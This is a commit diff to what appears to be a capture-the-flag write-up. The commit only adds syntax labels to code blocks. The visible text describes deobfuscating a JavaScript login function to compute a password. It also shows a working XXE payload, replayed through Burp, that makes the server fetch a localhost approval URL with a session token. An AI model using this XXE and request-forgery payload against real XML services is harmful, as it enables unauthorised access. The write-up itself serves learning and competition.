Commit 1dbe4e0a authored by Cool Fire (HN)'s avatar Cool Fire (HN)

More colours

parent cda57fe7
......@@ -5,9 +5,10 @@ The logo contains the text which contains the URL for the next phase. We just ne
# Phase 2
Protip: tell chrome to ignore that one breakpoint that triggers every second.
There is an obfuscated JS section at the end of a JS file, let Firefox scratchpad run it and print the result with `console.log()` to get this deobfuscated function:
```
```javascript
function login() {
var key = "i want to win the pwctf!";
var uid = document.location.search.split('=')[1];
......@@ -32,7 +33,7 @@ function login() {
Then simplify the code down a little and stick your uid in it to calculate and print the correct pass:
```
```javascript
var key = 'i want to win the pwctf!';
var uid = '32177e59ac87d481b8ad10a69c811537';
......@@ -59,6 +60,6 @@ The registration page sends XML data in a POST request, we can use XXE and a rem
replay the request through burp with the XXE included:
```
```xml
<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY sp SYSTEM "http://localhost/approve.php?session=s%253Ae2Efka7vpc4DUXWg5MsXft21xgkAvYGM.EFMK13ksf8irpWSMkZk3bcwWL4URZLZnytaBPeZbrv8">]><user><name>cFire</name><email>coolfire@insomnia247.nl</email></user><r>&sp;</r>
```
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment